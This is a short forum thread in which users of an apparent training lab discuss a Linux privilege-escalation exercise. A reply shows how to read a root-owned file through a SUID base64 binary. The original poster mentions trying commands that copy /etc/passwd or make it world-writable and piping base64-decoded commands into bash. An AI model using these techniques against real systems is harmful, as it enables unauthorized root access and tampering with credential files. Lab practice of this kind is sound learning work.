Forum Discussion

gwenael's avatar
gwenael
Icon for Bronze II rankBronze II
2 months ago
Solved

Privilege Escalation: Linux – Demonstrate Your Skills

Hello, I’m doing the Lab "Privilege Escalation: Linux – Demonstrate Your Skills". I’m stuck on the second part regarding the FILE-SRV-DEV, I’ve found with linPEAS a file ( /usr/bin/base64) with the...
help & support
immersive labs
  • steven's avatar
    steven
    2 months ago

    hmm.. on FILE_SRV-DEV you should just execute base64 and the file you want to see.
    with SUID rights you'll see the content (as base64) so just revert it :)

    merle@file-srv-dev:/tmp$ base64 /root/escalated.txt | base64 -d

    Privilege Escalation Completed -- FILE-SRV-DEV ✅

    once you did this try to figure out how the server gets backuped and how you can interfere.

steven's avatar
steven
Icon for Silver II rankSilver II
2 months ago

hmm.. on FILE_SRV-DEV you should just execute base64 and the file you want to see.
with SUID rights you'll see the content (as base64) so just revert it :)

merle@file-srv-dev:/tmp$ base64 /root/escalated.txt | base64 -d

Privilege Escalation Completed -- FILE-SRV-DEV ✅

once you did this try to figure out how the server gets backuped and how you can interfere.

  • gwenael's avatar
    gwenael
    Icon for Bronze II rankBronze II
    2 months ago

    Thank you Steven,

    Simpler than I was trying and doesn’t work 🙂

    echo "cmd" | base64 (with cmd= cp /etc/passwd /tmp/passwd or chmod 777 /etc/passwd etc …)

    echo hashcmd | base64 -d | bash